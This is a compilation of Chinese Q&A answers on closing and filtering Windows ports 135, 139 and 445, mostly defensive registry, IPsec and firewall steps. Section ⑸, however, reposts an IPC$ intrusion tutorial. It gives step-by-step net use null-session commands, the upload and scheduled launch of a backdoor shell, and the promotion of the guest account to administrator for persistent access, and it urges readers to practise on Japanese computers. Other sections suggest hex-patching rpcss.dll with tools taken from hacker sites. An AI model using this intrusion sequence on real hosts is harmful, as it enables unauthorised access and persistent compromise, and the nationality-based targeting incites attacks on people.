⑴ winxp中如何設置過濾埠收到的數據,比如445 139;
可以用IP過濾設置,或者只開自己想用的幾個埠。。
⑵ 445埠的關閉方法
這種方法利用了Windows 2000系統的埠排除功能將來自於445埠的所有信息包全部禁止掉,讓「大惡人」們無法接近你的主機,下面是這種方法的具體實現步驟:
打開Windows 2000系統的開始菜單,選中「設置」項下面的「網路和撥號連接」圖標,並用滑鼠右鍵單擊之,從其後的快捷菜單中,單擊「瀏覽」命令; 將「Internet協議(TCP/IP)」項選中,然後再單擊一下「屬性」按鈕,打開Internet協議(TCP/IP)屬性設置頁面; 繼續單擊該頁面中的「高級」按鈕,打開高級TCP/IP設置窗口,選中其中的「選項」標簽,並在該標簽頁面的「可選的設置」項中,將「TCP/IP篩選」選中,再單擊一下對應的「屬性」按鈕,打開如圖1所示的設置窗口; 由於445埠屬於一種TCP埠,你可以在對應「TCP埠」的設置項處,將「只允許」項選中,激活下面的「添加」按鈕,單擊該按鈕,在其後打開的「添加篩選器」窗口中,將必須用到的幾個服務埠號碼,都添加進來,而將用不到的445埠號碼排除在外,設置完畢後,單擊「確定」按鈕,就可以讓設置生效了。 考慮到文件夾或列印機共享服務才會利用到445埠,因此直接將文件夾或列印機共享服務停止掉,同樣也能實現關閉445埠的目的,讓黑客無法破壞各種共享資源,下面是關閉文件夾或列印機共享服務的具體步驟: 選中「網路和撥號連接」圖標,並用滑鼠右鍵單擊之,從其後的快捷菜單中,單擊「瀏覽」命令;
在接著出現的窗口中,右擊「Internet連接」圖標,選中「屬性」選項,彈出Internet連接屬性窗口;打開「常規」標簽頁面,並在「此連接使用下列選定的組件」列表框中,將「Microsoft網路的文件或列印機共享」選項前面的勾號取消,如圖2所示。最後單擊「確定」按鈕,重新啟動系統,Internet上的「大惡人」們就沒有權利訪問到各種共享資源了。 當然,你也可以在不停止共享服務的條件下,剝奪「大惡人」們的共享訪問權利;利用本地安全設置中的「用戶權利指派」功能,指定Internet上的任何用戶都無權訪問本地主機,具體步驟為: 單擊「本地安全設置」選項,接著展開「安全設置」「本地策略」「用戶權利指派」文件夾,在對應的右邊子窗口中選中「拒絕從網路訪問這台計算機」選項,並用滑鼠左鍵雙擊之; 打開如圖3所示的設置窗口,單擊「添加」按鈕,從彈出的「選擇用戶或組」對話框中選中「everyone」選項,再單擊「添加」按鈕,最後單擊「確定」,這樣任何一位用戶都無法從網路訪問到本地主機。不過該方法「打擊」范圍比較廣,造成的後果是無論是「敵人」還是「良民」,都無法訪問到共享資源了,因此這種方法適宜在保存有絕對機密信息的伺服器中使用。 這種方法是通過修改注冊表將用於文件夾或列印機共享的服務禁止掉,具體操作方法為:在Windows 2000系統的開始菜單中,單擊「運行」命令,打開運行對話框,輸入「regEdit」注冊表編輯命令,彈出注冊表編輯界面;
在該窗口中,用滑鼠逐一展開分支「HKEY_LOCAL_MACHINESYSTEMCurrent- 」;在對應該分支的右邊窗口中,新創建一個雙位元組值,並命名為「SMBDeviceEnabled」(如圖4所示),再將其數值直接設置為「0」,完成設置後,退出注冊表編輯界面,重新啟動一下系統就OK了。 這種方法利用防火牆的安全過濾規則將通過445埠的任何數據包攔截下來。比方說,你可以啟動「KV3000的反黑王防火牆」工具,單擊「防火牆控制」處的「規則設置」按鈕,在接著打開的規則設置窗口中,繼續單擊一下「增加規則」按鈕,打開如圖5所示的設置界面;
在該界面的名稱設置項處,將該規則命名為「關閉445埠」,在「網路條件」設置項處,選中「接受數據包」選項;然後將對方IP地址設置為「任何地址」,將本地IP地址處的「指定本地IP地址」選項選中,並輸入本地主機的IP地址。 下面,再單擊一下該界面中的「TCP」標簽,並在本地埠處,選中「指定埠」選項,然後輸入「445」埠號碼;在「對方埠」處,選中「任一埠」選項。
接著,在「規則對象」設置項處選中「系統訪問網路時」選項,在「當所有條件滿足時」設置項處,選中「攔截」選項,完成所有參數設置後,再單擊一下「確定」按鈕,就可以創建好一個安全過濾規則。返回到反黑王防火牆的規則設置窗口,選中剛剛創建好的「關閉445埠」的過濾規則(如圖6所示),如此一來,來自445埠的各種非法入侵都會被反黑王防火牆自動攔截。 這種方法,是通過自定義一個IP安全策略,將445服務埠關閉掉,具體實現步驟為: 在Windows 2000系統的開始菜單中,依次單擊「程序」「管理工具」「本地安全策略」,打開一個本地組策略編輯界面,用滑鼠右鍵單擊該界面中的「IP安全策略,在本地機器」選項,從打開的快捷菜單中,單擊「創建IP安全策略」選項,彈出一個創建向導界面;單擊「下一步」按鈕,然後在「名稱」文本框中,輸入新創建的安全策略名稱,例如這里輸入的是「關閉445埠」,再單擊一下「下一步」按鈕,選中「激活默認響應規則」,其餘參數均設置為默認值,就可以完成新安全策略的創建操作了,如圖7所示。 單擊圖7界面中的「添加」按鈕,彈出一個安全規則設置向導界面,單擊「下一步」按鈕,選中「此規則不指定隧道」選項,然後將「網路類型」設置為「所有網路連接」,接著選中「Windows 2000默認值……」選項,繼續單擊「下一步」按鈕後,彈出一個IP篩選器列表界面;單擊該界面中的「添加」按鈕,將IP篩選器的名稱設置為「阻止445埠」,單擊「添加」按鈕後,再將源地址設置為「任何IP地址」,將目標地址設置為「我的IP地址」,繼續單擊「下一步」按鈕後,彈出協議類型選擇框,將協議類型設置為「TCP」; 接著,在彈出的圖8窗口中,選中「從任意埠到此埠」選項,並將此埠設置為「445」,最後單擊「完成」按鈕,並單擊「關閉」按鈕,返回到IP篩選器列表頁面中,選中「阻止445埠」篩選器,單擊「下一步」按鈕,並從隨後打開的窗口中,選中「拒絕」選項;再單擊「下一步」、「完成」按鈕,就可以將「阻止445埠」的篩選器,添加到名為「關閉445埠」的IP安全策略中了(如圖9所示),再單擊「確定」按鈕,返回到「本地安全設置」窗口中。
最後,在「本地安全設置」窗口中,右擊「關閉445埠」策略,從彈出的快捷菜單中,依次單擊「所有任務」|「指派」命令,就能使上述設置生效了。
⑶ 怎樣關閉和過濾埠
一般放火牆都有這功能的。
也可以自己設置IP規則
⑷ 445埠 445埠是什麼
445埠是一個毀譽參半的埠,他和139埠一起是IPC$入侵的主要通道。有了它我們可以在區域網中輕松訪問各種共享文件夾或共享列印機,但也正是因為有了它,黑客們才有了可乘之機,他們能通過該埠偷偷共享你的硬碟,甚至會在悄無聲息中將你的硬碟格式化掉!我們所能做的就是想辦法不讓黑客有機可乘,封堵住445埠漏洞。 關閉445埠 關閉445埠的方法有很多,但是我比較推薦以下這種方法: 修改注冊表,添加一個鍵值 Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 修改完後重啟機器,運行「netstat -an」,你將會發現你的445埠已經不再Listening了。
⑸ 如何開啟445埠
6月15日 11:01 <P>1 嘮叨一下: <BR>網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄. <BR>不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少). <BR>因此我寫了這篇相當於解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復! </P>
<P><BR>2 什麼是ipc$ <BR>IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權,在遠程管理計算機和查看計算機的共享資源時使用。 <BR>利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。 <BR>我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網路登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。 <BR>所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的許可權,從而達到不可告人的目的. </P>
<P>解惑: <BR>1)IPC連接是Windows NT及以上系統中特有的遠程網路登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。 <BR>也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的) <BR>2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接 <BR>3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表 </P>
<P><BR>3 建立ipc$連接在hack攻擊中的作用 <BR>就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!! <BR>(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!) <BR>不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的 <BR>因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接. <BR>所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在. </P>
<P><BR>4 ipc$與空連接,139,445埠,默認共享的關系 <BR>以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂) </P>
<P>1)ipc$與空連接: <BR>不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了. <BR>許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何許可權(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲). <BR>2)ipc$與139,445埠: <BR>ipc$連接可以實現遠程登陸及對默認共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享文件/列印機的訪問,因此一般來講,ipc$連接是需要139或445埠來支持的. <BR>3)ipc$與默認共享 <BR>默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享) </P>
<P><BR>5 ipc$連接失敗的原因 <BR>以下5個原因是比較常見的: <BR>1)你的系統不是NT或以上操作系統; <BR>2)對方沒有打開ipc$默認共享 <BR>3)對方未開啟139或445埠(惑被防火牆屏蔽) <BR>4)你的命令輸入有誤(比如缺少了空格等) <BR>5)用戶名或密碼錯誤(空連接當然無所謂了) <BR>另外,你也可以根據返回的錯誤號分析原因: <BR>錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權; <BR>錯誤號51,Windows 無法找到網路路徑 : 網路有問題; <BR>錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾); <BR>錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$; <BR>錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。 <BR>錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了; <BR>錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況) <BR>錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。 <BR>關於ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了. </P>
<P><BR>6 如何打開目標的IPC$(此段引自相關文章) <BR>首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin許可權的,然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法),還是不行的話(比如有防火牆,殺不了)建議放棄。 </P>
<P><BR>7 如何防範ipc$入侵 <BR>1)禁止空連接進行枚舉(此操作並不能阻止空連接的建立) <BR>首先運行regedit,找到如下組建[HKEY_LOCAL_]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等) <BR>2)禁止管理共享 <BR>同樣也是找到如下組鍵[HKEY_LOCAL _]把AutoShareServer = DWORD的鍵值改為:00000000 <BR>3)關閉ipc$和默認共享依賴的服務 <BR>lanmanserver,即server服務 <BR>4)安裝防火牆(選中相關設置),或者埠過濾(濾掉139,445等),或者用新版本的優化大師 <BR>5)設置復雜密碼,防止通過ipc$窮舉密碼 </P>
<P><BR>(菜菜鳥社區原創<A href="http://ccbirds.yeah.net">http://ccbirds.yeah.net</A>) </P>
<P><BR>8 相關命令 <BR>1)建立空連接: <BR>net use \IPipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格) </P>
<P>2)建立非空連接: <BR>net use \IPipc$ "用戶名" /user:"密碼" (同樣有3個空格) </P>
<P>3)映射默認共享: <BR>net use z: \IPc$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推) <BR>如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \IPc$ </P>
<P>4)刪除一個ipc$連接 <BR>net use \IPipc$ /del </P>
<P>5)刪除共享映射 <BR>net use c: /del 刪除映射的c盤,其他盤類推 <BR>net use * /del 刪除全部,會有提示要求按y確認 </P>
<P><BR>9 經典入侵模式 <BR>這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩) </P>
<P>1. C:>net use \127.0.0.1IPC$ "" /user:"admintitrators" <BR>這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。 <BR> <BR>2. C:> srv.exe \127.0.0.1admin$ <BR>先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:winntsystem32,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。 <BR> <BR>3. C:>net time \127.0.0.1 <BR>查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。 <BR> <BR>4. C:>at \127.0.0.1 11:05 srv.exe <BR>用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!) <BR> <BR>5. C:>net time \127.0.0.1 <BR>再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。 <BR> <BR>6. C:>telnet 127.0.0.1 99 <BR>這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。 <BR>雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了 <BR> <BR>7.C:> ntlm.exe \127.0.0.1admin$ <BR>用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。 <BR> <BR>8. C:WINNTsystem32>ntlm <BR>輸入ntlm啟動(這里的C:WINNTsystem32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務! </P>
<P>9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈) </P>
<P>為了以防萬一,我們再把guest激活加到管理組 <BR>10. C:>net user guest /active:yes <BR>將對方的Guest用戶激活 </P>
<P>11. C:>net user guest 1234 <BR>將Guest的密碼改為1234,或者你要設定的密碼 </P>
<P>12. C:>net localgroup administrators guest /add <BR>將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機) </P>
<P><BR>10總結: <BR>關於ipc入侵就說這么多了,覺得已經夠詳細了,如果有不準確的地方,希望能與大家討論. <BR>最後,希望大家不要隨便入侵,我寫這篇文章的目的是想解答大家的疑惑,並不是鼓勵大家隨便的入侵,如果你非想試一下,建議拿小日本的機子開練(什麼?為什麼?因為我討厭日本,沒別的) <BR></P>
⑹ 如何過濾和防範埠135,139,445的信息
如何關閉139埠
默認情況下,Windows有很多埠是開放的,在你上網的時候,網路病毒和黑客可以通過這些埠連上你的電腦。為了讓你的系統變為銅牆鐵壁,應該封閉這些埠,主要有:TCP 135、139、445、593、1025 埠和 UDP 135、137、138、445 埠,一些流行病毒的後門埠(如 TCP 2745、3127、6129 埠),以及遠程服務訪問埠3389。下面介紹如何在WinXP/2000/2003下關閉這些網路埠:
第一步,點擊「開始」菜單/設置/控制面板/管理工具,雙擊打開「本地安全策略」,選中「IP 安全策略,在本地計算機」,在右邊窗格的空白位置右擊滑鼠,彈出快捷菜單,選擇「創建 IP 安全策略」(如右圖),於是彈出一個向導。在向導中點擊「下一步」按鈕,為新的安全策略命名;再按「下一步」,則顯示「安全通信請求」畫面,在畫面上把「激活默認相應規則」左邊的鉤去掉,點擊「完成」按鈕就創建了一個新的IP 安全策略。
第二步,右擊該IP安全策略,在「屬性」對話框中,把「使用添加向導」左邊的鉤去掉,然後單擊「添加」按鈕添加新的規則,隨後彈出「新規則屬性」對話框,在畫面上點擊「添加」按鈕,彈出IP篩選器列表窗口;在列表中,首先把「使用添加向導」左邊的鉤去掉,然後再點擊右邊的「添加」按鈕添加新的篩選器。
第三步,進入「篩選器屬性」對話框,首先看到的是定址,源地址選「任何 IP 地址」,目標地址選「我的 IP 地址」;點擊「協議」選項卡,在「選擇協議類型」的下拉列表中選擇「TCP」,然後在「到此埠」下的文本框中輸入「135」,點擊「確定」按鈕(如左圖),這樣就添加了一個屏蔽 TCP 135(RPC)埠的篩選器,它可以防止外界通過135埠連上你的電腦。
點擊「確定」後回到篩選器列表的對話框,可以看到已經添加了一條策略,重復以上步驟繼續添加 TCP 137、139、445、593 埠和 UDP 135、139、445 埠,為它們建立相應的篩選器。
重復以上步驟添加TCP 1025、2745、3127、6129、3389 埠的屏蔽策略,建立好上述埠的篩選器,最後點擊「確定」按鈕。
第四步,在「新規則屬性」對話框中,選擇「新 IP 篩選器列表」,然後點擊其左邊的圓圈上加一個點,表示已經激活,最後點擊「篩選器操作」選項卡。在「篩選器操作」選項卡中,把「使用添加向導」左邊的鉤去掉,點擊「添加」按鈕,添加「阻止」操作(右圖):在「新篩選器操作屬性」的「安全措施」選項卡中,選擇「阻止」,然後點擊「確定」按鈕。
第五步、進入「新規則屬性」對話框,點擊「新篩選器操作」,其左邊的圓圈會加了一個點,表示已經激活,點擊「關閉」按鈕,關閉對話框;最後回到「新IP安全策略屬性」對話框,在「新的IP篩選器列表」左邊打鉤,按「確定」按鈕關閉對話框。在「本地安全策略」窗口,用滑鼠右擊新添加的 IP 安全策略,然後選擇「指派」。
於是重新啟動後,電腦中上述網路埠就被關閉了,病毒和黑客再也不能連上這些埠,從而保護了你的電腦。
1.關閉135埠
使用Windows 2000或者XP的用戶今天都被那個利用RPC服務漏洞的蠕蟲病毒折騰的夠戧吧,該病毒主要攻擊手段就是掃描計算機的135埠來進行攻擊,現在教大家一種手動關閉135埠的方法,雖然不能完全解決問題,但也是能解一時的燃眉之急。更新微軟的補丁還是必要的。
用一款16為編輯軟體(推薦UltraEdit)打開你系統x:winntsystem32或者x:windowssystem32下的rpcss.dll文件。
查找31 00 33 00 35替換為30 00 30 00 30
查找3100330035,將其替換為3000300030,意思就是將135埠改為000。
至此修改的任務已經完成,下面將面臨一個保存的問題。因為該文件正在運行,在Windows環境下是不能覆蓋的。如果你是FAT32文件系統,那麼直接引導進DOS環境,將修改好的文件覆蓋掉原來的文件。
如果是NTFS格式,相對就麻煩一些。進安全模式。然後啟動pulist列出進程,然後用pskill這個程序(不少黑客網站有的下)殺掉svchost.exe程序。然後在COPY過去。
覆蓋後重新啟動,使用netstat -an命令,可以看到Windows 2000下已經沒有135埠了。XP系統下還有TCP的135,但是UDP裡面已經沒有135埠了。
2.關閉445埠
關閉445埠的方法有很多,但是我比較推薦以下這種方法:
修改注冊表,添加一個鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\CurrentControlSet\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完後重啟機器,運行「netstat -an」,你將會發現你的445埠已經不再Listening了。
⑺ 445埠受到網路攻擊,怎麼辦
網上抄過來的
其實你只要把445埠對應的服務關掉就行了
根本解決方法
找到攻擊你的那台電腦 然後幫他殺個毒就行了
1.埠排除法
單擊「開始」 →「設置」 →「網路和撥號連接」 →「Internet連接」,選中「屬性」選項,彈出Internet連接屬性窗口;
打開「常規」標簽頁面,選中「Internet協議(TCP/IP)」,單擊「屬性」,再單擊屬性頁面中的「高級」按鈕,打開高級TCP/IP設置窗口,選中「選項」標簽,並在該標簽頁面的「可選的設置」項中,將「TCP/IP篩選」選中,同時單擊「屬性」,打開設置窗口
由於445埠屬於一種TCP埠,你可以在對應「TCP埠」的設置項處,將「只允許」項選中,激活下面的「添加」按鈕,單擊該按鈕,在其後打開的 「添加篩選器」窗口中,將必須用到的幾個服務埠號碼,都添加進來,而將用不到的445埠號碼排除在外,設置完畢後,單擊「確定」按鈕,就可以讓設置生效了。
2 。服務關閉法
考慮到文件夾或列印機共享服務,才會利用到445埠,因此直接將文件夾或列印機共享服務停止掉,同樣也能實現關閉445埠的目的:
按前面方法,打開「Internet連接」屬性窗口;在「常規」標簽頁面中,將「此連接使用下列選定的組件」列表框中的「Microsoft網路的文件或列印機共享」選項取消,再單擊「確定」,重新啟動系統就可以了。
當然,你也可以利用本地安全設置中的「用戶權利指派」功能,指定Internet上的任何用戶都無權訪問本地主機,從而實現間接關閉445埠的目的:
依次單擊「開始」 →「程序」 →「管理工具」 →「本地安全設置」選項,展開「安全設置」 →「本地策略」 →「用戶權利指派」文件夾,雙擊「拒絕從網路訪問這台計算機」(如圖2);繼續單擊「添加」,選中「everyone」選項,再單擊「添加」、「確定」,這樣任何一位外來訪問者,都無法從網路訪問到本地主機了。不過該方法,「打擊」范圍比較廣,造成的後果是無論是「敵人」,還是「良民」,都無法訪問到共享資源了,因此這種方法,適宜在保存有絕對機密信息的伺服器中使用。
3。注冊表設置法
種方法,是通過修改注冊表,將用於文件夾或列印機共享的服務禁止掉,具體操作方法為:
依次展開注冊表分支HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT \Parameters,在右邊窗口中新創建「SMBDeviceEnabled」雙位元組值,再將其設置為「0」,然後重新啟動一下系統就OK了。
4. 防火牆設置法
這種方法,是利用防火牆的安全過濾規則,將通過445埠的任何數據包攔截下來。比方說,啟動「KV3000的反黑王防火牆」,單擊「防火牆控制」處的「規則設置」按鈕,再單擊「增加規則」,打開圖3界面;
在該界面的名稱設置項處,輸入「關閉445埠」,在「網路條件」處,選中「接受數據包」,並將對方IP地址設置為「任何地址」,將本地IP地址設置為「指定本地IP地址」,然後輸入本地主機的IP地址。
單擊「TCP」標簽,並在本地埠處,選中「指定埠」,並輸入「445」;在「對方埠」處,選中「任一埠」選項。
圖3
在「規則對象」處,選中「系統訪問網路時」,在「當所有條件滿足時」處,選中「攔截」,最後單擊「確定」,完成安全過濾規則的創建。返回到反黑王防火牆的規則設置窗口,選中剛剛創建好的「關閉445埠」的過濾規則,如此一來,來自445埠的各種非法入侵,都會被反黑王防火牆自動攔截。
組策略設置法
依次單擊「開始」→「程序」→「管理工具」→「本地安全策略」,打開一個本地組策略編輯界面,右擊「IP安全策略,在本地機器」,執行「創建IP安全策略」命令,彈出一個創建向導界面;
單擊「下一步」,在「名稱」處,輸入「關閉445埠」,再單擊「下一步」,選中「激活默認響應規則」,其餘參數均設置為默認值,就可以完成新安全策略的創建操作了;單擊「添加」,繼續單擊「下一步」,選中「此規則不指定隧道」,然後將「網路類型」設置為「所有網路連接」,接著選中「Windows 2000默認值……」選項,再單擊「下一步」,在IP篩選器列表界面中單擊「添加」,將IP篩選器名稱設置為「阻止445埠」,單擊「添加」,再將源地址設置為「任何IP地址」,將目標地址設置為「我的IP地址」,繼續單擊「下一步」,選中「TCP」;
在隨後的窗口中,選中「從任意埠到此埠」,並輸入「445」,最後依次單擊「完成」、「關閉」,返回到IP篩選器列表頁面;然後選中「阻止445埠」篩選器,單擊「下一步」,選中「拒絕」選項,再依次單擊「下一步」、「完成」按鈕,就能將「阻止445埠」的篩選器,添加到名為「關閉445埠」的IP安全策略中了,再單擊「確定」按鈕,返回到「本地安全設置」窗口中。
最後,在「本地安全設置」窗口中,右擊「關閉445埠」策略,從彈出的快捷菜單中,依次單擊「所有任務」/「指派」命令,就能使上述設置生效了。
⑻ 勒索病毒哪些埠需要關閉
需要關閉445埠,勒索病毒利用Windows操作系統445埠存在的漏洞進行傳播,並具有自我復制、主動傳播的特性。
關閉445埠的詳細操作步驟如下:
1、首先,打開Windows防火牆,單擊左側「啟動或關閉Windows Defender 防火牆」,如下圖所示。
⑼ 電腦系統有多少個埠 135139445埠是什麼
65535個 但是一般使到的也就是十幾個,下面是我找的一些常用埠簡介,希望對你有幫助 1) 公認埠(Well Known Ports):從0到1023,它們緊密綁定於一些服務。通常這些埠的通訊明確表明了某種服務的協議。例如:80埠實際上總是HTTP通訊。 2) 注冊埠(Registered Ports):從1024到49151。它們鬆散地綁定於一些服務。也就是說有許多服務綁定於這些埠,這些埠同樣用於許多其它目的。例如:許多系統處理動態埠從1024左右開始。 3) 動態和/或私有埠(Dynamic and/or Private Ports):從49152到65535。理論上,不應為服務分配這些埠。實際上,機器通常從1024起分配動態埠。但也有例外:SUN的RPC埠從32768開始 用埠對照 埠:0 服務:Reserved 說明:通常用於分析操作系統。這一方法能夠工作是因為在一些系統中「0」是無效埠,當你試圖使用通常的閉合埠連接它時將產生不同的結果。一種典型的掃描,使用IP地址為0.0.0.0,設置ACK位並在乙太網層廣播。 埠:1 服務:tcpmux 說明:這顯示有人在尋找SGI Irix機器。Irix是實現tcpmux的主要提供者,默認情況下tcpmux在這種系統中被打開。Irix機器在發布是含有幾個默認的無密碼的帳戶,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。許多管理員在安裝後忘記刪除這些帳戶。因此HACKER在INTERNET上搜索tcpmux並利用這些帳戶。 埠:7 服務:Echo 說明:能看到許多人搜索Fraggle放大器時,發送到X.X.X.0和X.X.X.255的信息。 埠:19 服務:Character Generator 說明:這是一種僅僅發送字元的服務。UDP版本將會在收到UDP包後回應含有垃圾字元的包。TCP連接時會發送含有垃圾字元的數據流直到連接關閉。HACKER利用IP欺騙可以發動DoS攻擊。偽造兩個chargen伺服器之間的UDP包。同樣Fraggle DoS攻擊向目標地址的這個埠廣播一個帶有偽造受害者IP的數據包,受害者為了回應這些數據而過載。 埠:20、21 服務:FTP 說明:FTP伺服器所開放的埠,用於上傳、下載。最常見的攻擊者用於尋找打開anonymous的FTP伺服器的方法。這些伺服器帶有可讀寫的目錄。木馬Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所開放的埠。 埠:22 服務:Ssh 說明:PcAnywhere建立的TCP和這一埠的連接可能是為了尋找ssh。這一服務有許多弱點,如果配置成特定的模式,許多使用RSAREF庫的版本就會有不少的漏洞存在。 埠:23 服務:Telnet 說明:遠程登錄,入侵者在搜索遠程登錄UNIX的服務。大多數情況下掃描這一埠是為了找到機器運行的操作系統。還有使用其他技術,入侵者也會找到密碼。木馬Tiny Telnet Server就開放這個埠。 埠:25 服務:SMTP 說明:SMTP伺服器所開放的埠,用於發送郵件。入侵者尋找SMTP伺服器是為了傳遞他們的SPAM。入侵者的帳戶被關閉,他們需要連接到高帶寬的E-MAIL伺服器上,將簡單的信息傳遞到不同的地址。木馬Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個埠。 埠:31 服務:MSG Authentication 說明:木馬Master Paradise、Hackers Paradise開放此埠。 埠:42 服務:WINS Replication 說明:WINS復制 埠:53 服務:Domain Name Server(DNS) 說明:DNS伺服器所開放的埠,入侵者可能是試圖進行區域傳遞(TCP),欺騙DNS(UDP)或隱藏其他的通信。因此防火牆常常過濾或記錄此埠。 埠:67 服務:Bootstrap Protocol Server 說明:通過DSL和Cable 